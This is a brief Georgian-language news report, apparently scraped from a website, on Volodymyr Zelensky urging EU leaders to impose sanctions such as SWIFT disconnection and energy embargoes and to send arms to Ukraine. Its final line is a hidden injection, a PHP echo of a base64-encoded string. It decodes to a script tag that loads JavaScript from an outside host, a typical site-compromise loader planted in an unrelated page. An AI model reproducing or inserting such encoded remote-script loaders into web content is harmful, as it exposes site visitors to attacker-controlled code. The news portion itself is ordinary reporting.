celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ ევროკავშირის ლიდერებს მოუწოდა, გვერდში დაუდგნენ უკრაინას და შეაჩერონ აგრესორი.
 
მისივე თქმით, ევროპის ბედი წყდება უკრაინაში და თუ პუტინი ახლა არ მიიღებს ღირსეულ პასუხს, ის უფრო წინ წავა.
 
"აგრესორის წინააღმდეგ დაუყოვნებლივ უნდა იქნას მიღებული მკაცრი ეკონომიკური და ფინანსური სანქციები, რაც მას წაართმევს აგრესიის გაგრძელების საშუალებებს: გათიშვა SWIFT-დან, ემბარგოს დაწესება ნავთობითა და გაზის ვაჭრობაზე. ასევე გაეროს სამშვიდობო ოპერაციის მხარდაჭერა,  უკრაინის ჯარის იარაღითა და საბრძოლო მასალის დახმარება.
 
ჩვენი ხალხი კვდება უკრაინის და ევროპის თავისუფლებისთვის. გაღებულ კართან დიდხანს ველოდით. ნატოში გაწევრიანებაზე ვიკითხეთ - პასუხი არ გაგვიგია. ახლა ჩვენ გვჭირდება უსაფრთხოების საერთაშორისო სამართლებრივი გარანტიები, მკაფიო ევროპული პერსპექტივა, სწრაფი და კონკრეტული ქმედება,"- განაცხადა ვოლოდიმირ ზელენსკიმ.
 
 
754
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");